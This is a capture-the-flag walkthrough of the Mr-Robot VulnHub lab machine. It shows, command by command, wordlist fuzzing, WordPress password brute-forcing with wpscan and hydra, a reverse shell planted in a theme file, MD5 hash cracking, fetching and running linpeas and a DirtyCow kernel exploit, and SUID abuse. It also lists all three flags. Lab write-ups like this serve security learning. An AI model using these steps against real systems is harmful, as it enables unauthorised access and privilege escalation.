Mr.Robot

By Lawcky & Taen 26/12/2023

Introduction

Mr.Robot is a wellknown machine inspired by the series Mr.Robot

Difficulty : Medium

Additionnal info :

Name: Mr-Robot: 1
Release date: 28 Jun 2016
Author: Leon Johnson
Series: Mr-Robot

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

---

In this write-up

• curl & wget
• uniq
• wpscan
• nmap
• hydra
• ffuf
• hashcat
• python
• nc & reverse-shell code
• dirtycow’s exploit

---

Write-UP

Robots.txt

content :

User-agent: *
fsocity.dic contains a wordlist
key-1-of-3.txt
curl http://192.168.1.34/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
first flag found

---

fsocity.dic

clearing the wordlist

cat fsocity.dic | sort | uniq > filtered_list.dic
reducing the wordlist from 850000 entries to around 12000 entries

---

fuzzing the site using the filtered wordlist

ffuf -w filtered_list.dic:DIC -u http://192.168.1.34/DIC

we can see different directories with one called Year… which is fobidden access

---

Wordpress

dictionnary attack on target using filtered wordlist and user admin

sudo wpscan --url http://192.168.1.34/wp-login.php --password-attack wp-login -U admin -P filtered_list.dic

admin is not a valid user

---

using hydra to fuzz for valid usernames

sudo hydra -L filtered_list.txt -p password 192.168.1.34 -I -V http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username."

---

Dictionnary attack on target using filtered wordlist and valid users Elliot, elliot and ELLIOT

sudo wpscan --url http://192.168.1.34/wp-login.php --password-attack wp-login -U Elliot,elliot,ELLIOT -P filtered_list.dic

---

ReverseShell Time

on the 404.php page of the used theme
then nc -lnvp 1234 on our machine
curl http://192.168.1.34/wp-content/themes/twentyfifteen/404.php to execute the remote code

---

Upgrading TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL-Z + stty raw -echo && fg
export TERM=xterm-256color
to get a better shell with CTRL-C

---

User Robot

ls /home/robot
 
we find the password of the robot user in md5 format and the second key which can
only be read by the robot user

---

Hashcat

sudo hashcat -m 0 MrRobot.md5 rockyou.txt

password are all the letters from A to Z

---

MrRobot

su robot

cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959
second flag found

---

Privilege escalation

user robot doesn’t have access to sudo

linpeas.sh

on our machine
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
python3 -m http.server 8080 open a http server to send the file to the target

on our target
wget http://192.168.1.253:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
the enumeration reveals kernel exploits and Suid exploits

---

DirtyCow’s path

exploit:https://www.exploit-db.com/exploits/40839

since the target doesnt have DNS access we’ll be using the same technique as before to transfer the files using python3 server module
on our machine
wget https://github.com/exrienz/DirtyCow/raw/master/dc64.c
python3 -m http.server 8080

on our target
wget http://192.168.1.253:8080/dc64.c
gcc dc64.c -o cowroot -pthread
./cowroot

exploit worked

04787ddef27c3dee1ee161b21670b4e4
third flag found

---

Bonus : SUID exploits

Intended way for this machine

find / -perm -4000 2>/dev/null
searching for binairies with SUID permissions

we can see nmap which is a vulnerable binairy ==> https://gtfobins.github.io/

And now we exploit it :

---

Flags

flag 1/3

073403c8a58a1f80d943455fb30724b9

found in the robots.txt

---

flag 2/3

822c73956184f694993bede3eb39f959

found in the user robot’s desktop

---

flag 3/3

04787ddef27c3dee1ee161b21670b4e4

found in root directory

---